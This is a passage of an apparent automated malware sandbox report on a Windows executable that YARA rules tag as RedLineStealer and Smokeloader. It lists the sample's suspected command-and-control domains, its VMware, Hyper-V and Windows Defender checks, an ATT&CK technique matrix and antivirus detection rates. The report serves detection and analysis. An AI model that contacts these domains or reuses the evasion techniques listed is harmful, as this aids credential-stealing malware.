      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007385970_2_00738597
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007345870_2_00734587
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007416F60_2_007416F6
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007556940_2_00755694
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007546870_2_00754687
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007527770_2_00752777
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007677670_2_00767767
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007377570_2_00737757
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007397E70_2_007397E7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007478060_2_00747806
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007369770_2_00736977
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007569370_2_00756937
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007589270_2_00758927
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0073A9E70_2_0073A9E7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0076F9870_2_0076F987
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00768A770_2_00768A77
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0074EA270_2_0074EA27
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00749A290_2_00749A29
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00738AB70_2_00738AB7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00751B070_2_00751B07
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00735BF70_2_00735BF7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00733BD70_2_00733BD7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00760BA70_2_00760BA7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00750BA00_2_00750BA0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0073EC770_2_0073EC77
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0075CCB00_2_0075CCB0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0075DCBC0_2_0075DCBC
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0075CD780_2_0075CD78
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00766D6F0_2_00766D6F
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0075CD370_2_0075CD37
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0075CD890_2_0075CD89
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0074DE670_2_0074DE67
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0074CE630_2_0074CE63
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0073DE400_2_0073DE40
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0075AEF70_2_0075AEF7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0074FEDC0_2_0074FEDC
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00746F350_2_00746F35
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0076EF070_2_0076EF07
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0073CFAD0_2_0073CFAD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: String function: 00408030 appears 42 times
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: String function: 00744667 appears 65 times
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: String function: 00414400 appears 65 times
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: String function: 00738297 appears 72 times
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1728
      Source: HK8IIasL9i.exe, 00000000.00000003.2058726057.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesDefence> vs HK8IIasL9i.exe
      Source: HK8IIasL9i.exe, 00000000.00000000.2050554870.000000000044B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesDefence> vs HK8IIasL9i.exe
      Source: HK8IIasL9i.exeBinary or memory string: OriginalFilenamesDefence> vs HK8IIasL9i.exe
      Source: HK8IIasL9i.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: HK8IIasL9i.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004707A6 CreateToolhelp32Snapshot,Module32First,0_2_004707A6
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00430C70 CoCreateInstance,0_2_00430C70
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6720
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\c16237f1-f778-4418-a632-d4072e0f42c1Jump to behavior
      Source: HK8IIasL9i.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: HK8IIasL9i.exeReversingLabs: Detection: 55%
      Source: HK8IIasL9i.exeVirustotal: Detection: 40%
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeFile read: C:\Users\user\Desktop\HK8IIasL9i.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\HK8IIasL9i.exe "C:\Users\user\Desktop\HK8IIasL9i.exe"
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1728
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeUnpacked PE file: 0.2.HK8IIasL9i.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeUnpacked PE file: 0.2.HK8IIasL9i.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh0_2_0043D812
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00441895 push 0000002Dh; retf 0_2_0044189D
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004419BC push esi; iretd 0_2_00441A51
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00441A36 push esi; iretd 0_2_00441A51
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00443469 push ebp; iretd 0_2_0044346C
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0044366E push 9F00CD97h; ret 0_2_004436B1
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h0_2_0043AE3E
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004477A5 push ebp; iretd 0_2_004477AA
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0047582A push ss; retf 0_2_0047589B
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004758AD push ss; retf 0_2_0047589B
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004714DC push 00000039h; ret 0_2_004715B3
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00473480 push ebp; ret 0_2_00473483
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00471545 push 00000039h; ret 0_2_004715B3
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0047156B push 00000039h; ret 0_2_004715B3
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0076B097 push eax; mov dword ptr [esp], 1D1E1F10h0_2_0076B0A5
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0076DA77 push eax; mov dword ptr [esp], 707F7E0Dh0_2_0076DA79
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00753A79 push esp; iretd 0_2_00753A7C
      Source: HK8IIasL9i.exeStatic PE information: section name: .text entropy: 7.797011755872956
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe TID: 5464Thread sleep time: -30000s >= -30000sJump to behavior
      Source: Amcache.hve.4.drBinary or memory string: VMware
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(~d%SystemRoot%\system32\mswsock.dll
      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
      Source: HK8IIasL9i.exe, 00000000.00000003.2139420813.0000000000646000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000646000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@~d@~dH~dH~dP~dP~dX~dX~d`~d`~dh~dh~dp~dp~dx~dx~d
      Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: HK8IIasL9i.exe, 00000000.00000002.2488519478.000000000066E000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.4.drBinary or memory string: vmci.sys
      Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.4.drBinary or memory string: VMware20,1
      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043C1F0 LdrInitializeThunk,0_2_0043C1F0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00470083 push dword ptr fs:[00000030h]0_2_00470083
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0073092B mov eax, dword ptr fs:[00000030h]0_2_0073092B
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00730D90 mov eax, dword ptr fs:[00000030h]0_2_00730D90

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: HK8IIasL9i.exeString found in binary or memory: rapeflowwj.lat
      Source: HK8IIasL9i.exeString found in binary or memory: crosshuaht.lat
      Source: HK8IIasL9i.exeString found in binary or memory: sustainskelet.lat
      Source: HK8IIasL9i.exeString found in binary or memory: aspecteirs.lat
      Source: HK8IIasL9i.exeString found in binary or memory: energyaffai.lat
      Source: HK8IIasL9i.exeString found in binary or memory: necklacebudi.lat
      Source: HK8IIasL9i.exeString found in binary or memory: discokeyus.lat
      Source: HK8IIasL9i.exeString found in binary or memory: grannyejh.lat
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      PowerShell
      1
      DLL Side-Loading
      1
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping11
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Process Injection
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol2
      Clipboard Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Deobfuscate/Decode Files or Information
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
      Obfuscated Files or Information
      NTDS2
      System Information Discovery
      Distributed Component Object ModelInput Capture114
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
      Software Packing
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      HK8IIasL9i.exe55%ReversingLabsWin32.Trojan.AceCrypter
      HK8IIasL9i.exe40%VirustotalBrowse
      HK8IIasL9i.exe100%AviraHEUR/AGEN.1306978
      HK8IIasL9i.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      steamcommunity.com
      23.55.153.106
      truefalse
        high
        lev-tolstoi.com
        104.21.66.86
        truefalse
          high
          sustainskelet.lat
          unknown
          unknownfalse
            high
            crosshuaht.lat
            unknown
            unknownfalse
              high
              rapeflowwj.lat
              unknown
              unknownfalse
                high
                grannyejh.lat
                unknown
                unknownfalse
                  high
                  aspecteirs.lat
                  unknown
                  unknownfalse
                    high
                    discokeyus.lat
                    unknown
                    unknownfalse
                      high
                      energyaffai.lat
                      unknown
                      unknownfalse
                        high
                        necklacebudi.lat
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          aspecteirs.latfalse
                            high
                            sustainskelet.latfalse
